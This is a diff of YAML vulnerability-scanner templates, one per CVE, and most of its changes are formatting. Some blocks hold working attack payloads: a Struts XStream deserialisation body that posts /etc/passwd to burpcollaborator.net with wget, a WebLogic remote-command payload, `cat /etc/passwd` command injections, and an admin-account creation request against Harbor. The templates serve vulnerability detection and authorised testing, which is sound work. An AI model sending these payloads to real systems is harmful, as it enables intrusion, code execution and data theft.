- https://www.exploit-db.com/exploits/43592
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
tags: oracle,redirect
requests:

4
cves/2017/CVE-2017-5487.yaml
View File

@ -7,8 +7,8 @@ info:
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
requests:
- method: GET

18
cves/2017/CVE-2017-5638.yaml
View File

@ -10,15 +10,15 @@ info:
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word

114
cves/2017/CVE-2017-9805.yaml
View File

@ -18,63 +18,63 @@ requests:
headers:
Content-Type: application/xml
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
<string>burpcollaborator.net</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
<string>burpcollaborator.net</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
matchers-condition: and
matchers:

4
cves/2018/CVE-2018-16059.yaml
View File

@ -5,8 +5,8 @@ info:
author: daffainfo
severity: medium
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
requests:

4
cves/2018/CVE-2018-16283.yaml
View File

@ -5,8 +5,8 @@ info:
author: 0x240x23elu
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:

4
cves/2018/CVE-2018-17431.yaml
View File

@ -7,8 +7,8 @@ info:
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
reference:
- https://www.exploit-db.com/exploits/48825
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
- https://www.exploit-db.com/exploits/48825
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
requests:
- raw:

2
cves/2018/CVE-2018-8715.yaml
View File

@ -7,7 +7,7 @@ info:
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass
reference:
- https://github.com/embedthis/appweb/issues/610
- https://github.com/embedthis/appweb/issues/610
requests:
- raw:

6
cves/2019/CVE-2019-0193.yaml
View File

@ -6,9 +6,9 @@ info:
author: pdteam
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:

8
cves/2019/CVE-2019-0221.yaml
View File

@ -9,10 +9,10 @@ info:
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:

2
cves/2019/CVE-2019-1010287.yaml
View File

@ -12,7 +12,7 @@ info:
google-dork: inurl:"/timesheet/login.php"
requests:
- raw: # Metod POST From login.php
- raw: # Metod POST From login.php
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}

8
cves/2019/CVE-2019-12616.yaml
View File

@ -7,9 +7,9 @@ info:
severity: medium
tags: cve,cve2019,phpmyadmin,csrf
reference:
- https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
- https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests:
- method: GET
@ -32,4 +32,4 @@ requests:
- type: status
status:
- 200
- 401 #password protected
- 401 # password protected

6
cves/2019/CVE-2019-13101.yaml
View File

@ -7,9 +7,9 @@ info:
severity: critical
tags: cve,cve2019,dlink,router,iot
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
requests:
- raw:

2
cves/2019/CVE-2019-15043.yaml
View File

@ -6,7 +6,7 @@ info:
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana

2
cves/2019/CVE-2019-15107.yaml
View File

@ -9,7 +9,7 @@ info:
tags: cve,cve2019,webmin,rce
requests:
- raw: #
- raw: #
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}

6
cves/2019/CVE-2019-16097.yaml
View File

@ -6,8 +6,8 @@ info:
description: |
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
reference:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951
tags: cve,cve2019,intrusive,harbor
requests:
@ -17,7 +17,7 @@ requests:
headers:
Content-Type: application/json
body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
matchers-condition: and
matchers:

2
cves/2019/CVE-2019-17506.yaml
View File

@ -14,7 +14,7 @@ requests:
- "{{BaseURL}}/getcfg.php"
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml

4
cves/2019/CVE-2019-2616.yaml
View File

@ -6,8 +6,8 @@ info:
severity: high
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- https://www.exploit-db.com/exploits/46729
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:

4
cves/2019/CVE-2019-2767.yaml
View File

@ -6,8 +6,8 @@ info:
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:

18
cves/2019/CVE-2019-3396.yaml
View File

@ -10,16 +10,16 @@ info:
requests:
- raw:
- |
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and
matchers:

4
cves/2019/CVE-2019-7238.yaml
View File

@ -6,8 +6,8 @@ info:
severity: critical
tags: cve,cve2019,nexus,rce
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238
requests:
- raw:

2
cves/2019/CVE-2019-7256.yaml
View File

@ -11,7 +11,7 @@ info:
tags: cve,cve2019,emerge,rce
requests:
- raw: # Default Port
- raw: # Default Port
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}

30
cves/2019/CVE-2019-9733.yaml
View File

@ -13,22 +13,22 @@ info:
requests:
- raw:
- |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Content-Length: 60
Accept: application/json, text/plain, */*
X-Requested-With: artUI
serial: 58
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9
Connection: close
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Content-Length: 60
Accept: application/json, text/plain, */*
X-Requested-With: artUI
serial: 58
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9
Connection: close
{"user":"access-admin","password":"password","type":"login"}
{"user":"access-admin","password":"password","type":"login"}
matchers-condition: and
matchers:

4
cves/2020/CVE-2019-9618.yaml
View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: critical
reference:
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:

6
cves/2020/CVE-2020-11034.yaml
View File

@ -6,9 +6,9 @@ info:
severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect

6
cves/2020/CVE-2020-11978.yaml
View File

@ -5,9 +5,9 @@ info:
severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference:
- https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418
- https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce
requests:

16
cves/2020/CVE-2020-13167.yaml
View File

@ -10,16 +10,16 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
requests:
- method: GET

6
cves/2020/CVE-2020-13700.yaml
View File

@ -6,9 +6,9 @@ info:
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress
requests:

12
cves/2020/CVE-2020-13937.yaml
View File

@ -5,12 +5,12 @@ info:
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html

2
cves/2020/CVE-2020-14883.yaml
View File

@ -17,7 +17,7 @@ requests:
Test-Header: cat /etc/passwd
body: |
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
matchers-condition: and
matchers:

4
cves/2020/CVE-2020-15148.yaml
View File

@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii
requests:

8
cves/2020/CVE-2020-15227.yaml
View File

@ -6,10 +6,10 @@ info:
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:

2
cves/2020/CVE-2020-21224.yaml
View File

@ -17,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html"
body: |
op=login&username=;`cat /etc/passwd`&password=
op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and
matchers:

6
cves/2020/CVE-2020-27866.yaml
View File

@ -7,9 +7,9 @@ info:
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass
reference:
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests:
- raw:

6
cves/2020/CVE-2020-27986.yaml
View File

@ -5,9 +5,9 @@ info:
author: pikpikcu
severity: medium
description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube

4
cves/2020/CVE-2020-36112.yaml
View File

@ -5,8 +5,8 @@ info:
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference:
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
severity: critical
tags: cve,cve2020,sqli,cse

4
cves/2020/CVE-2020-36289.yaml
View File

@ -7,8 +7,8 @@ info:
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
tags: cve,cve2020,jira,atlassian
reference:
- https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
- https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
requests:
- method: GET

2
cves/2020/CVE-2020-5307.yaml
View File

@ -5,7 +5,7 @@ info:
author: gy741
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference:
- https://cinzinga.com/CVE-2020-5307-5308/
- https://cinzinga.com/CVE-2020-5307-5308/
severity: critical
tags: cve,cve2020,sqli

4
cves/2020/CVE-2020-7209.yaml
View File

@ -13,8 +13,8 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET

4
cves/2020/CVE-2020-7961.yaml
View File

@ -7,8 +7,8 @@ info:
tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference:
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
